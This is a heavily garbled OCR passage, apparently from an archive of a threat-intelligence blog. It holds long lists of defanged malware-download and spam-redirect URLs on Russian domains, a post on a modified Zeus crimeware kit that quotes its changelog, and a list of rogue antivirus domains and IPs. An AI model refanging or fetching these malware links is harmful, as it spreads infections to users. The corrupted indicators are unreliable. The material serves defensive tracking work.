hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]Jexe?etag=e1a906dddb593bf0aab5fb- 
c8ae9f2ea0 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=e6e6e6d9466 7 3ff0ecdbc8- 
9eb4d69d03 

hxxp://heltenha[. ]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=fd72cfbo884d32d4eb2 8d6f- 
fd70435621 


hxxp://heltenha[.]Jecolinkshop[.]ru/goinf_ plugin _cis[.]Jexe?etag=0f71759a0903a88cadbaf9fc8- 
la20fd2 


hxxp://heltenha[.]ecolinkshop[.]ru/goinf_ plugin _cis[.]Jexe?etag=30bd1364670dd725211078ecf- 
1292f36 


hxxp://heltenha[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=318c25cbec268a9cb517419f1- 
951d09c 


hxxp://heltenha[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=3cc8a62ab408f754c6338359d- 
4aa0be8 


hxxp://heltenha[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=3e33f7367619f39b2205e196e- 
bab6c4d 


hxxp://heltenha[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=5c84c5c4e015bc8f81b1787ec- 
3a3214b 


19798 


hxxp://heltenha[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=5d872624edcfb223d1c97f5e6- 
65c03e9 


hxxp://heltenha[.Jecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=716551b343053501a4b7e3503- 
f083a44 


hxxp://heltenha[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=786aeaa0fed2253f43d2d408c- 
3a65d44 


hxxp://heltenha[.Jecolinkshop[.]ru/goinf plugin cis[.Jexe?etag=a0fb07f58fc5fd39ced2b44e2- 
4945ba8 


hxxp://heltenha[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=a165286711407817ae24671ad- 
e6a8440 


hxxp://heltenha[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=d180cd6a93be3fca5f1473cd6- 
b1fd269 


hxxp://heltenha[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=ec96ca68faa3aed368981bcb1- 
f5c0c25 


hxxp://heltenha[.Jecolinkshop[.]ru/kinoroom _browser[.Jexe?etag=9ea6b74e51f165cfb77ee- 
7190f5b9263 


hxxp://heltenha[.Jecolinkshop[.]ru/kinoroom _browser[.Jexe?etag=e0b17cc92105d6cbffd49- 
91074e22afa 


hxxp://hernigo[.]ecolinkshop[. ]ru/goinf _plugin[.]exe?etag=50bd8c20657a8fbb536ae5- 
d3965baa36 


hxxp://hernigo[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=dacl1de251c869f8f3f4c74d5- 
34912a9 


hxxp://nesapea[.]Jeco-link-shop[. ]ru/goinf _plugin[.Jexe?etag=271850b980a6f71cd092c7- 
4cb7e27e56 

hxxp://hesapeal.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=44c3bc545fbf83705c40d1- 
Occd3ef0e5 

hxxp://hesapeal.]eco-link-shop[. ]ru/goinf _plugin[.]exe?etag=85d7ec66d82c8405c08dfb- 
c41955e065 


hxxp://nesapea[.]Jeco-link-shop[. ]ru/vkmusicdownloader[.]exe?etag=7 - 
350d63790b6c68f120930e6b4aee4c9 


hxxp://hicagoa[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=bb5faaa2a15840332b3f55- 
1f6136dc4b 

hxxp://hicagoa[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=eabda8f335e7a0db596712- 
d741232dab 


hxxp://hinodermata[.]Jecolinkshop[.]ru/goinf _plugin[.]Jexe?etag=61f75ace51f5be6d2670dc- 
290a9431a7 


hxxp://hintchi[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=f9a9adea385ca7433cf2e9- 
273700354a 


hxxp://hire[. ]loveessay[.]dnsalias[.]com/review/62/paper/11 
hxxp://hlamypho[.]eco-link-shop[. ]ru/ 


hxxp://hlamypho[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=a0a9bed6736464e36173ba- 
1ed990284f 


19799 


hxxp://hlamypho[.Jecolink24[.]ru/go _search _taskbar[.]Jexe?etag=elee393e0fa7405b669b6- 
1c7c2588b48 


hxxp://hlamypho[.Jecolink24[.]ru/go search _taskbar[.]Jexe?etag=e75d3acf62f4c6afdb597- 
d0492b54464 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=038cfaf0624a58703e2c1fe31- 
b768d6c 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=31391aed5181f2adf5518c20d- 
b753ff9 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf_ plugin _cis[.]Jexe?etag=3e67943fe9272991f82212a52- 
198a5bf 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=5abe0cf9a61c30ecc5aaf3873- 
b00alef 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf_ plugin _cis[.Jexe?etag=8a9e7b422c805dab56739d1ac- 
645b67d 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=a2930a1562dd997966ffb32a4- 
c803ela 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf_ plugin _cis[.Jexe?etag=ca24925e898b8a3879ccabae7- 
e0c4feb 


hxxp://hlamypho[.]Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=elee393e0fa7405b669b61c7c- 
2588b48 


hxxp://hlamypho[.Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=e75d3acf62f4c6afdb597d049- 
2654464 


hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=038cfaf0624a5 8703e2c1fe31b768d6c 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=31391aed5181f 2adf5518c20db753ff9 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=3e67943fe9272 991f82212a52198a5bf 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=5abe0cf9a61c3 Oecc5aaf3873b00alef 


hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=838e8b5cea945 d7- 
c92a653e6da855fd2 


hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=8a9e7b422c805 - 
dab56739d1ac645b67d 


hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=ca24925e898 b8a3879ccabae7e0c4feb 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=dd346d550 63cal18f2f1c885b07a9ad51 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=df4d8d6 052f7380a7500bcb7fc357c86 

hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=elee3 93e0fa7405b669b61c7c2588b48 
hxxp://hlamypho[.]Jecolink24[.]ru/nethost[.]exe?etag=fea d95812bca3f2779b63eba3ccba599 


hxxp://hlamypho[.]Jecolink24[.]ru/vk audio video _cis[.]Jexe?etag=3e67943fe9272991f82212a52- 
198a5bf 


hxxp://hlamypho[.]Jecolink24[.]ru/vk audio video _cis[.Jexe?etag=ca24925e898b8a387 9ccabae7- 
e0c4feb 


19800 


hxxp://hlamypho[.]Jecolink24[.]ru/vk audio video _cis[.]Jexe?etag=df4d8d6052f7380a7500bcb7f- 
c357c86 


hxxp://hlamypho[.]Jecolink24[.]ru/vk audio video _cis[.Jexe?etag=elee393e0fa7405b669b61c7c- 
2588b48 


hxxp://hlamypho[.]Jecolink24[.]ru/vk audio video _cis[.Jexe?etag=e75d3acf62f4c6afdb597d049- 
2b54464 


hxxp://hlamypho[.]ecolinkshop[. ]ru/ 


hxxp://hlamypho[.]ecolinkshop[. ]ru/goinf _plugin[.]lexe?etag=3f6b1841e64a5b954888bf- 
742f40686f 


hxxp://hlamypho[.]ecolinkshop[.]ru/kinoroom _browser[.]exe?etag=106a60d945cb1c4d39396- 
44c41f36eb6 


hxxp://hlamypho[.]ecolinkshop[.]ru/nethost[.]Jexe?etag=48627cde5c5 385c5b- 
3c4cOdf5f11d172 


hxxp://hloridea[. ]eco-link-shop[.]ru/vkmusicdownloader[.]exe?etag=1 - 
803ab4545e9f81264870052df4feee5 


hxxp://hloridea[.]eco-link-shop[. ]ru/vkmusicdownloader|[.]exe?etag =7- 
9136bfea9189384al6eae3d2e2cbe84 


hxxp://hloroxylo[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=28de494ca08d8af3de76b5d75- 
2085e69 


hxxp://hloroxylo[.Jecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=6a78115eba5cb6da39b0c8d3c- 
ef5cb05 


hxxp://hAnm[.]goldenshopone|[.]from-ca[.]com/ 


hxxp://nome[.]igoho[.]com/link[.]php?url=hxxp://acd[.]mamasho ping[.]clou- 
dns[.]cx/sitemap[. ]txt 


hxxp://nhomeworkgiant[.]copy-max[.]com/essay/1/paper/nyu-anthropology- dissertations/ 


hxxp://hondrilla[.]ecolinkshop[. ]ru/goinf _plugin[.lexe?etag=d073514e22cfbcf57f21f2- 
675335baf0 


hxxp://hop[.]smartwritingservice[.]4pu[.]com/essay/1/paper/58/ 
hxxp://hos[.]smartwritingservice[.]4pu[.]com/free-essays/1/paper/ 21/ 
hxxp://hos[.]smartwritingservice[.]4pu[.]com/topic/1/essay/42/ 


hxxp://hristmasti[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=Oc8db628ac8fifc40e7e2al1a9- 
6f5024a 


hxxp://hristogra[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=e748d03bfc93e7c36f7409f95- 
4592cbc 


hxxp://hromaproo[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=48d49c4559cdb0df13e9f1- 
3478e73cc6 


hxxp://hrysospleni[.Jeco-link-shop[.]ru/goinf_plugin_cis[.]exe?etag=0d29051310610aaca81cOfcf3- 
10e18e2 


hxxp://hrysosto[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=79f2a0fabd0dc26b4d7b6b7b8- 
d06b729 


19801 


hxxp://htz[.]goldenshopone[.]from-ca[.]com/ 


hxxp://hurchillia[. }eco-link-shop[. ]ru/nethost[.]exe?etag=2ed6d6691 42- 
e42835ef84ee96fcelel7 


hxxp://hyn[.]goldenshopone[.]from-ca[.]com/ 

hxxp://i[. Jmobilerz[.]net/jump[.]php?url=hxxp://aff[.]mamasho ping[.]cloudns[.]cx/ 
hxxp://i[. ]Jmpbus[.]com/link[.]php?url=hxxp://xdy[.]auctions20 00[.]myphotos[.]cc/ 
hxxp://ibn[.]kladtv[.]com/ 

hxxp://icb[.]kladtv[.]com/ 

hxxp://ice[. Jauctions2018[. ]dnsalias[.]net/ 

hxxp://iebermal.]eco-link-shop[.]ru/ 

hxxp://ihsosal[. ]Jclub/pdf/gkpkOuntc9rq0od1f9mq39sal[. ]php 
hxxp://ikg[.]astra[.]cloudns[.]cx/ 

hxxp://ilipino[.]ecolinkshop[.]ru/ 

hxxp://illiputia[. ]ecolink24[. ]ru/ 


hxxp://illiputia[. ]Jecolink24[. ]ru/2inf _favorites[.]exe?etag=590f48a3560df5c3a0d- 
fe7fb1b12ebfd 


hxxp://illiputia[.]ecolink24[.]ru/2inf _icon[.Jexe?etag=590f48a3560df5c3a0dfe7fbo1b12ebfd 
hxxp://illiputia[.Jecolink24[.]ru/2inf launch[.Jexe?etag=590f48a3560df5c3a0dfe7fo1lb12ebfd 
hxxp://illiputia[.]Jecolink24[.]ru/2inf shortcutmaker [.]ico 


hxxp://illiputia[. ]Jecolink24[. ]ru/2inf _Startlink[.]exe?etag=590f48a3560df5c3a0d- 
fe7fb1b12ebfd 
hxxp://illiputia[. Jecolink24[.Jru/2inf _startpage[.Jexe?etag=590f48a3560df5c3a0d- 
fe7fb1b12ebfd 


hxxp://illiputia[.Jecolink24[.]ru/go search —_desktop[.Jexe?etag=590f48a3560df5c3a0dfe- 
7fb1b12ebfd 


hxxp://illiputia[.Jecolink24[.]ru/go search _taskbar[.]Jexe?etag=590f48a3560df5c3a0dfe- 
7fb1b12ebfd 


hxxp://illiputia[.Jecolink24[.]Jru/goinf _plugin _cis[.Jexe?etag=590f48a3560df5c3a0dfe7fb1- 
b12ebfd 


hxxp://illiputia[.]ecolink24[.]ru/gosearch3[.]ico 
hxxp://illiputia[.]ecolink24[.]ru/nethost[.]lexe?etag=590f48a3560d f5c3a0dfe7fb1b12ebfd 
hxxp://iloveshoping[.]cloudns[.]cx/sitemap28[.]html 


hxxp://iltonia[.Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=63033facf4930fb343a43ddb9- 
a5914de 


hxxp://imalayal[.Jecolink24[.]ru/goinf _plugin[.Jexe?etag=f061049cf361506113566a- 
1cea184908 


hxxp://imalaya[.Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=Ocd7b8dce47e9ec7c99e43fb0- 
49dc1d4 


19802 


Language: English + 


Oops, they did it again - [1]modifying an open source crimeware kit like Zeus in order to 
improve its performance, fix previously known bugs, and release the improved administration 
script for free at the end of October. 


It’s important to point out that both of these modifications haven’t been released by 
[2]the original author of Zeus, but by third parties filling in the gaps he has left open. The very 
nature of open source web based malware exploitation kits is one of the key factors for the 
ongoing [3]convergence of traffic management, exploits serving, ddos, and cybercrime as a 
service features into a simplified cybercrime platform available on demand. 


Following the discovery of [4]a remotely exploitable flaw within Zeus in June - a [5]flaw 
affecting Pinch leaked out two months later - allowing cyberciminals to inject their own 
credentials and hijack the botnet of other cybercriminals, this modified version claims to 
have fixed three vulnerabilities within the original Zeus release, namely, a remote file inclu- 
sion flaw and two SQL injections within the administration panel. Here’s the new CHANGELOG : 


"- code improvements and optimizations 

- internal data checkings added 

- exit() function instead of die() 

- echo() function instead of print() 

- mysql _affected _rows () changed to mysq/ _num _rows () everywhere 

- all queries are fixed in system or mod .php files 

- no text password in the database and clear text password in $_ SESSION, cookies authentica- 
tion is gone and md5 hashes are everywhere 

- Geo IP support has been added 

- umask () bug fixed, the file has been created (chmoded) with different permissions 

- language improvements and pre-installation checks 

- checking for php version/safe _mod/open _basedir as you’re required to run php 5.1.0 or 
higher to run it successfully 

- fixed sql injection in credentials checking 

- GetUserData () function has been rewritten - possible sq/ injection fixed 

- possible remote file inclusion fixed 

- socket error definition changed 

- gcnt () function has been rewritten so you can use geolication - GeolP which is free and 
GeolPCity which is paid 

- ip address checking improved through validIP() function improvement 

- all queries are now fixed, input data has been sanitized 

- fs () function has been fixed in order to improve the quality of the log names 

- formatFilePath () function has been added for file upload purposes 

- arbitrary file upload bug has been fixed so that you can now upload only images with original 
names 

- the Log2SQL () function has been changed and stricter data checking/sanitizing is added 
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&url=hxxp://abw[.]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 
hxxp://lizabetha[.]ecolink24[.]ru/goinf _plugin[.Jexe?etag=d2febde69f8468a2c76942- 
3alc9da9al 


hxxp://Iks[. ]smartwritingservice[.]4pu[.]com/free-essays/1/essay/ 18/ 
hxxp://IIhallo[.Jecolink24[.]ru/goinf plugin[.]lexe?etag=d09e34da35d805faf7 7f95c69b435e18 
hxxp://llo[. ]smartwritingservice[.]4pu[.]com/topic/1/essay/39/ 
hxxp://Imm[.]Jauctions2018[.]homelinux[.]net/ 

hxxp://login[. ]ezproxy[.]lib[.Jusf[.]edu/login?url=hxxp://o df[.]Jgoldenshopone[.]from-ca[.]com/ 


hxxp://lovegitararussia[. ]ru/cgi-bin/redirect[.]cgi?url=hxxp://knn[ .]lgoldenshopone[. ]from- 
ca[.]com/ 


hxxp://lpb[.]zend[.]4pu[.]com/ 
hxxp://Itn[.Jauctions2018[.]dnsalias[.]net/ 
hxxp://lug[.]Jauctions2000[.]myphotos[.]cc/ 
hxxp://mM65[.]Joneshop[.]getmyip[.]com/article/1/22 


hxxp://m[.]woodlandsonline[.]com/linkredir[.]cfm?evid=107064 &url=hxxp://fsq[.]auctions2018[.]homelir 
x[.]net/ 


hxxp://magazin[.]imv-medien[. Jat/redirect[.]php?url=hxxp://ew x[.]Jauctions2018[.]dnsalias[.]net/ 
hxxp://mail[. ]martinswood[.]com/ 


hxxp://mailinglists[.]mpamedia[.]com/mpacms/dc/pi/link[.] php?p=607 &c=802 &p 
_url=hxxp://gch[.]goldenshopone|[.]from-ca[.]com/ 


hxxp://main[.]shopmarket[.]from-ca[.]Jcom 
hxxp://maloros[.]org/?goto=hxxp://rig[.]goldenshopone|[. ]from-ca[ .Jcom/ 
hxxp://malthaea[.]Jecolinkshop[.]ru/ 


hxxp://marissamiller[.]org/out[.]php?url=hxxp://ajs[.] mamashoping [.]cloudns[.]- 
cx/sitemap[.]txt 


hxxp://mazonia[.]Jecolink24[.]ru/goinf _plugin[.]exe? 
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- internal file sorting mechanism is improved so that files/dirs are sorted by file modification 
time" 


As it’s becoming increasingly clear that what once used to be a proprietary crimeware 
kits whose business model got undermined by their open source nature and the fact that 
they’ve started leaking for average cybercriminals and script kiddies to take advantage of, 
are today’s "open source projects" - and therefore maintaining static lists of exploits and 
features included within a particular kit is getting even more irrelevant these days. In the long 
term, the quality assurance processes applied within crimeware kits courtesy of third party 
cybercriminals, is prone to shift from performance to [6]Jimproving the infection rates. 


http: //ddanchev. blogspot . com/2008/09/modif ied-zeus-crimeware-kit-comes-with.htm 


ttp://www.usatoday.com/tech/news/computersecurity/2008-08-04-hacker-cybercrime-zeus-identity-theft_N.htm 


_http:/ adanchev blogspot. con/2008/06/veb-based-botnet-conmandand-control.tal 
| http: //adanchev blogspot. con/2008/06/zeus- crinevare-kit~vulnerable-to. hea] 
_http://adanchev blogspot .con/2008/06/pinch-vulnerable-to-renotely htm] 

_ het: //Adanchev blogspot .con/2008/10/qualty-and-assurance-in-nalwvare, heal 
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4.11.2 A Diverse Portfolio of Fake Security Software - Part Twelve (2008-11-03 22:36) 


amivirus-freescan.com 


antviruspctest.com 
mysecuritysupportcom 
online-privale-scan.com 
orbitaiclicks.com 


secureupdatecenter.com 


208.72.169.100 — ge 208.72.169,.021 ——AS-g A526790 


secureupdateserver.com 

secureyourpayments.com 

www. xpsoftupgrade.com ——SMME_s  sanerspsonupgrade.com 
voodoorevenue.com 

webscannertools.com 


mpsofupgrade.com 
These very latest rogue security software domains have been in circulation - blackhat SEO, 
SQL injections, traffic redirection scripts - since Friday and remain active : 


premium-pc-scan .com (78.159.118.217; 89.149.253.215; 91.203.92.47) 
1984 


hxxp://mb-werbeservice[.]de/out[.]php?url=hxxp://gte[.]kladtv[. ]Jcom/ 
hxxp://mbb[.]goldenshopone|[.]from-ca[.]com/ 
hxxp://mcgraw[.]loveessay[.]dnsalias[.]com/article/30/paper/57 
hxxp://mcgraw[.]loveessay[.]dnsalias[.]com/topic/33/essay/1 
hxxp://medimassage[. ]hu/linkkkkk/indxx[.]php 
hxxp://megav[.]Jepac[.]to/ 

hxxp://megav[.]epac[.]to/sitemap139[.]html 
hxxp://mhal[.]goldenshopone[.]from-ca[.]com/ 
hxxp://mhu[.]goldenshopone|[.]from-ca[.]com/ 


hxxp://microsoftsoftwaresolutions[.]com/Services/Redirect[.]aspx?url= hxx- 
p://bkv[. auctions2000[.]myphotos[.]cc/ 


hxxp://ministry[.]loveessay[.]dnsalias[.]com/article/10/paper/7 3 
hxxp://ministry[.]loveessay[.]dnsalias[.]com/article/24/essay /65 

hxxp://mki[. ]goldenshopone[.]from-ca[.]com/ 
hxxp://mmcpajero[.]ru/forum/go[.]php?to=hxxp://gpv[.]goldenshopon e[.]from-ca[.]com/ 
hxxp://mnl[.]smartwritingservice[.]4pu[.]com/essay/2/essay/4/ 


hxxp://models[.]world-collections[.]com/cgi-bin/df/out[.]cgi?ses= jVEuX3QqCO &id=831 
&url=hxxp://jon[.]goldenshopone[.]from-ca[.]com/ 


hxxp://momoantena[.]com/redirect?url=hxxp://gdo[.]goldenshopone[.] from-ca[.]com/ 
hxxp://monhyip[. ]net/redirect?url=hxxp://akd[.]mamashoping[.]clou dns[.]cx/sitemap[. ]txt 
hxxp://mopon[.]ru/out[.]php?link=hxxp://agp[.]mamashoping[.]c loudns[.]cx/sitemap[.]txt 
hxxp://mopon[.]ru/out[.]php?link=hxxp://dps[.]Jauctions2018[.] dnsalias[.]net/ 


hxxp://moskva[.]websender[.]ru/redirect[.]php?url=hxxp://lug[. Jauctio- 
ns2000[.]Jmyphotos[.]cc 


hxxp://mothersexypornvideo[.]com/cgi-bin/crtr/out[.]cgi?id=1879 &l=topmain 
&u=hxxp://spz[.Jauctions2000[.]cloudns[.]cx/sitemap2[.]htm! 


hxxp://motz[.]tk/catalinaislandferrycoupons2013764690 
hxxp://mq[.]jaredyounger[.]com/ 
hxxp://mag[.]jaredyounger[.]com/Mur 
hxxp://mq[. ]jaredyounger[.]com/Mzi 
hxxp://mq[.]jaredyounger[.]com/Naa 
hxxp://ma[.]jaredyounger[.]com/Okm 
hxxp://mq[.]jaredyounger[.]com/Oxq 
hxxp://mag[.]jaredyounger[.]com/Ysn 
hxxp://msy[.]Jauctions2000[.]myphotos[.]cc/ 
hxxp://mtp[.]goldenshopone[.]from-ca[.]com/ 
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hxxp://my[.Jausnz[.]net/nome/link[.]php?url=hxxp://xlw[.]gold enshopone[. ]from-ca[.]com/ 


hxxp://myuhxx[.]com/ 


hxxp://myyoungtits[.]com/cgi-bin/ucj/c[.]cgi?url=hxxp://ynil[. ]gol denshopone[.]from- 


ca[.]Jcom/ 


hxxp://mzo[.]smartwritingservice[.]4pu[.]Jcom/article/2017429/biog = raphy-of-aldous-huxley- 


essay/ 


hxxp://mzz[.]smartwritingservice[.]4pu[.]com/article/1/paper/73/ 


hxxp://naniwatourist[.]jp/nns/www/redirect[.]php?url=hxxp://osp[. ]Jgoldenshopone[. ]from- 


ca[.]com/ 


hxxp://nat-geo[.]ru/go[.]php?url=hxxp://uao[.]goldenshopone[.] from-ca[.]com/ 


hxxp://nature[.]professionalism[.]dontexist[.]com/free-essays/1/e ssay/93 


hxxp://navercorpal. ]website/ 


hxxp://nca[.]goldenshopone[.]from-ca[.]com/ 


hxxp://ndigirka[.Jecolink24[.]ru/2inf 
a19a4161485 


hxxp://ndigirka[.]Jecolink24[.]ru/2inf 
082936a3bf2a4 


hxxp://ndigirka[.]Jecolink24[.]ru/2inf 
24a19a4161485 


_autorun[.]exe?etag=f6fd594ede084d8e60c24- 


_favorites[.]exe?etag=a2dfdc3537bf7b79be8- 


_favorites[.]exe?etag=f6fd594ede084d8e60c- 


hxxp://ndigirka[.Jecolink24[.]ru/2inf _icon[.Jexe?etag=a2dfdc3537bf7b79be8082936a3bf2a4 
hxxp://ndigirka[.Jecolink24[.]ru/2inf icon[.Jexe?etag=f6fd594ede084d8e60c24a19a4161485 


hxxp://ndigirka[.]Jecolink24[.]ru/2inf 
936a3bf2a4 


hxxp://ndigirka[.]Jecolink24[.]ru/2inf 
19a4161485 


hxxp://ndigirka[.]Jecolink24[.]ru/2inf 
8082936a3bf2a4 


_launch[.]exe?etag=a2dfdc3537bf7b79be8082- 


_launch[.Jexe?etag=f6fd594ede084d8e60c24a- 


_pinnedtabs[.]exe?etag=a2dfdc3537bf7b79be- 


hxxp://ndigirka[.Jecolink24[.]ru/2inf shortcutmaker [.]Jico 


hxxp://ndigirka[.Jecolink24[.]ru/2inf speaddial[.]png 


hxxp://ndigirka[.Jecolink24[.]ru/2inf 
082936a3bf2a4 


hxxp://ndigirka[.]ecolink24[.]ru/2inf 
24a19a4161485 


hxxp://ndigirka[.Jecolink24[.]ru/2inf 
082936a3bf2a4 


hxxp://ndigirka[.Jecolink24[.]ru/go 
2936a3bf2a4 


hxxp://ndigirka[.Jecolink24[.]ru/go 
a19a4161485 
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_search 


_search 


_Startlink[.]exe?etag=a2dfdc3537bf7b79be8- 


_Startlink[.]exe?etag=f6fd594ede084d8e60c- 


_startpage[.]Jexe?etag=a2dfdc3537bf7b79bes- 


_desktop[.]exe?etag=a2dfdc3537bf7b79be808- 


_desktop[.]lexe?etag=f6fd594ede084d8e60c24- 


hxxp://ndigirka[.Jecolink24[.]ru/go search _taskbar[.]Jexe?etag=a2dfdc3537bf7b79be808- 
2936a3bf2a4 


hxxp://ndigirka[.Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=a2dfdc3537bf7b79be8082936- 
a3bf2a4 


hxxp://ndigirka[.Jecolink24[.]ru/gosearch3[.]ico 
hxxp://ndigirka[.]ecolink24[.]ru/nethost[.]exe?etag=a2dfdc3537bf7 b79be8082936a3bf2a4 
hxxp://ndigirka[.]Jecolink24[.]ru/nethost[.]exe?etag=f6fd594ede084 d8e60c24a19a4161485 


hxxp://ndigirka[.Jecolink24[.]ru/vk audio video _cis[.]exe?etag=a2dfdc3537bf7b79be8082936- 
a3bf2a4 


hxxp://ndolima[.]eco-link-shop[.]ru/ 


hxxp://ndolimal[.]eco-link-shop[.]ru/nethost[.]exe?etag=a2c8bb56eee - 
5b4daf5c49b71d394a140 


hxxp://ndonesia[.]eco-link-shop[. ]ru/ 


hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=e965e82a205d26e267 7ff- 
9074d24571c 

hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _favorites[.]exe?etag=79edeed809cebf0a430- 
a0e8d2a010803 

hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _icon[.Jexe?etag=79edeed809cebf0a430a0e8d- 
2a010803 

hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _icon[.]exe?etag=e965e82a205d26e2677ff907- 
4d24571c 

hxxp://ndonesial[.]eco-link-shop[. ]ru/2inf _launch[.]exe?etag=e965e82a205d26e267 7ff9- 
074d24571c 

hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _speeddiall.Jexe?etag=79edeed809cebf0a430- 
a0e8d2a010803 

hxxp://ndonesial[.]eco-link-shop[.]ru/2inf _Startlink[.]exe?etag=79edeed809cebf0a430- 
a0e8d2a010803 

hxxp://ndonesial.]eco-link-shop[.]ru/2inf _Startlink[.]exe?etag=e965e82a205d26e2677- 
ff9074d24571c 

hxxp://ndonesial[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=e965e82a205d26e2677- 
ff9074d24571c 


hxxp://ndonesial[.]eco-link-shop[.]ru/go search _desktop[.]exe?etag=79edeed809cebf0a430a0- 
e8d2a010803 


hxxp://ndonesial[.]eco-link-shop[.]ru/go search _desktop[.]lexe?etag=e965e82a205d26e267 7ff- 
9074d24571c 


hxxp://ndonesial[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=79edeed809cebf0a430a0- 
e8d2a010803 


hxxp://ndonesial[.]eco-link-shop[.]ru/go search _taskbar[.]exe?etag=e965e82a205d26e267 7ff- 
9074d24571c 


hxxp://ndonesia[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=79edeed809cebf0a430a0e8d2- 
a010803 
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hxxp://ndonesia[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=e965e82a205d26e2677ff9074- 
d24571c 


hxxp://ndonesial.]eco-link-shop[.]ru/gosearch3[.]ico 


hxxp://ndonesial[.]eco-link-shop[.]ru/nethost[.]exe?etag=e965e82a2 05- 
d26e2677ff9074d24571c 


hxxp://ndonesia[.]eco-link-shop[.]ru/vk audio video _cis[.]Jexe?etag=79edeed809cebf0a430a0e8d2- 
a010803 


hxxp://neh[.]deadlines[.]4pu[.]com/ 
hxxp://neocate[.]oneshop[.]getmyip[.]com/review/1/91 


hxxp://nepropetro[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=0875f37b2dbf6e2cbb857- 
3462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/2inf _favorites[.]Jexe?etag=0875f37b2dbf6e2cbb8- 
573462bc2ef18 


hxxp://nepropetro[.Jeco-link-shop[.]ru/2inf §_icon[.]Jexe?etag=0875f37b2dbf6e2cbb857346- 
2bc2ef18 


hxxp://nepropetro[.Jeco-link-shop[.]ru/2inf | _launch[.Jexe?etag=0875f37b2dbf6e2cbb8573- 
462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/2inf shortcutmaker [.]ico 


hxxp://nepropetro[.]eco-link-shop[.]ru/2inf _Startlink[.]exe?etag=0875f37b2dbf6e2cbb8- 
573462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/2inf _startpage[.Jexe?etag=0875f37b2dbf6e2cbb8- 
573462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/go_ search _desktop[.]lexe?etag=0875f37b2dbf6e2cbb857- 
3462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/go_ search _taskbar[.]exe?etag=0875f37b2dbf6e2cbb857- 
3462bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=0875f37b2dbf6e2cbb8573462- 
bc2ef18 


hxxp://nepropetro[.]eco-link-shop[.]ru/gosearch3[. ]ico 


hxxp://nepropetro[.]eco-link-shop[.]ru/nethost[.]exe?etag=0875f37 b2db- 
f6ée2cbb8573462bc2ef18 

hxxp://nepropetro[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=6efb7ff9d364cc8188672e- 
fbee8df65a 

hxxp://nepropetro[.]Jecolink24[.]ru/goinf _plugin[.]lexe?etag=b942 7a6f994279d78b6c91- 
56ea58386e 

hxxp://nepropetro[.]Jecolink24[.]ru/goinf _plugin[.]Jexe?etag=f9b0bd78flae82bdba5db7- 
a3365cc5f3 

